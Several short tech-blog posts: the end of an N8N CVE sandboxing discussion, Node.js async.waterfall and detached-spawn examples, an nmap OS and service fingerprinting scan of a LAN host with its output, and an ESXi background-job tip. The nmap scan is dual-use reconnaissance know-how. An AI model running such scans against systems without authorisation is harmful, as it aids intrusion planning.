Update, isolate, restrict: the three-step response to any critical CVE in a self-hosted tool.

The Bigger Picture: Sandboxing Arbitrary Code Is a Hard Problem

None of this is unique to N8N. Any platform whose core proposition is “run whatever code you like” faces the same fundamental tension. Sandboxing is not a feature you bolt on after the fact; it has to be the architectural foundation. The Pragmatic Programmer puts it well: “Design to be tested.” You could equally say “design to be breached” — assume code will escape the sandbox and build your layers of defence accordingly.

The blacklist vs. whitelist distinction matters enormously here. A whitelist sandbox says: “you may use these ten system calls and nothing else.” A blacklist sandbox says: “you may not use these hundred things,” and then waits for an attacker to find item 101. Kernel-level sandboxing tools like seccomp-bpf on Linux are the right building block for the whitelist approach in a container environment. Language-level tricks — Pyodide, V8 isolates, WASM boundaries — are useful layers but are not sufficient on their own.

The complicating factor, as the Low Level video below notes, is that N8N’s architecture has many nodes and the contracts between them multiply the surface area considerably. Getting every node’s sandbox right simultaneously, especially under active development with a small team, is genuinely difficult. These CVEs are a reminder that security review needs to scale with the feature count, not lag behind it.

Video Attribution

Credit to the Low Level channel for the original technical breakdown of these CVEs. The walkthrough of the constructor injection exploit and the Pyodide internals is worth watching in full:


nJoy 😉

Async waterfall example nodejs

To avoid callback hell, async.waterfall is a very useful tool for structuring calls in a sequence and making sure each step passes its data to the next.

var async = require('async');

async.waterfall(
    [
        function(callback) {
            callback(null, 'Yes', 'it');
        },
        function(arg1, arg2, callback) {
            var caption = arg1 +' and '+ arg2;
            callback(null, caption);
        },
        function(caption, callback) {
            caption += ' works!';
            callback(null, caption);
        }
    ],
    function (err, caption) {
        console.log(caption);
        // Yes and it works!
    }
);
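As an aside, in modern Node the same sequencing is usually written with native async/await rather than the async library. A sketch of the equivalent pipeline:

```javascript
// The same three-step sequence with native async/await: each step's return
// value flows into the next, and a thrown error short-circuits the chain
// the way a non-null err argument would in the waterfall.
async function buildCaption() {
  const [arg1, arg2] = await Promise.resolve(['Yes', 'it']); // step 1
  const caption = `${arg1} and ${arg2}`;                     // step 2
  return caption + ' works!';                                // step 3
}

buildCaption().then(caption => console.log(caption)); // Yes and it works!
```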

nJoy 😉

Node.js Start script or run command and handoff to OS (no waiting)

Sometimes you want to run something in the OS from your Node code, but you do not want to follow it or have a callback posted on your stack. By default, child_process spawning holds on to a handle for the child and keeps the parent's event loop alive. However, there is an option called detached.

var spawn = require('child_process').spawn;
spawn('/usr/scripts/script.sh', ['param1'], {
    detached: true
});

You can even set up the call to redirect the child's stdout and stderr to OS file descriptors, like this:

var fs = require('fs'),
    spawn = require('child_process').spawn,
    out = fs.openSync('./out.log', 'a'),
    err = fs.openSync('./err.log', 'a');

spawn('/usr/scripts/script.sh', ['param1'], {
    stdio: [ 'ignore', out, err ], // stdout to out.log, stderr to err.log
    detached: true
}).unref();

The unref() call removes the child from the parent's event loop reference count; combined with detached, it is roughly the equivalent of a disown in a shell.

Thanks to the OP: https://stackoverflow.com/questions/25323703/nodejs-execute-command-in-background-and-forget

Also Ref: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options

and

https://github.com/nodejs/node-v0.x-archive/issues/9255

nJoy 😉

Identify OS on remote host

For nmap to even make a guess at the operating system, it needs to find at least one open and one closed port on the remote host. Using the previous scan results, let us find out more about the host 192.168.0.115:

# nmap -O -sV 192.168.0.115

Output:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 12:21 CEST
Nmap scan report for 192.168.0.115
Host is up (0.00023s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 5.1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.19 ((Unix) mod_ssl/2.2.19 OpenSSL/0.9.8zf DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.2.19 ((Unix) mod_ssl/2.2.19 OpenSSL/0.9.8zf DAV/2)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
873/tcp   open  rsync       (protocol version 29)
2049/tcp  open  nfs         2-4 (RPC #100003)
49152/tcp open  upnp        Portable SDK for UPnP devices 1.6.9 (Linux 2.6.39.3; UPnP 1.0)
MAC Address: 00:26:2D:06:39:DB (Wistron)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.38 - 3.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2.6.39.3


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds

nJoy 😉

How to quit ESXi SSH and leave background tasks running

In Linux, when a console session is closed, most background jobs (started with ^Z and bg %n) stop running, because a properly closing parent (the SSH session) sends a SIGHUP to all of its children. Some programs catch and ignore the SIGHUP, or do not handle it at all and simply get reparented to init. The disown builtin removes a background job from the list of jobs the shell will send SIGHUP to.

In ESXi there is no disown command. However there is a way to close a shell immediately without issuing the SIGHUPs :

exec </dev/null >/dev/null 2>/dev/null

Normally exec replaces the current shell with a command, but when given only redirections and no command, it applies those redirections to the current shell itself. Detaching stdin, stdout, and stderr from the terminal this way lets you close the SSH session without the background jobs being hung up.

nJoy 😉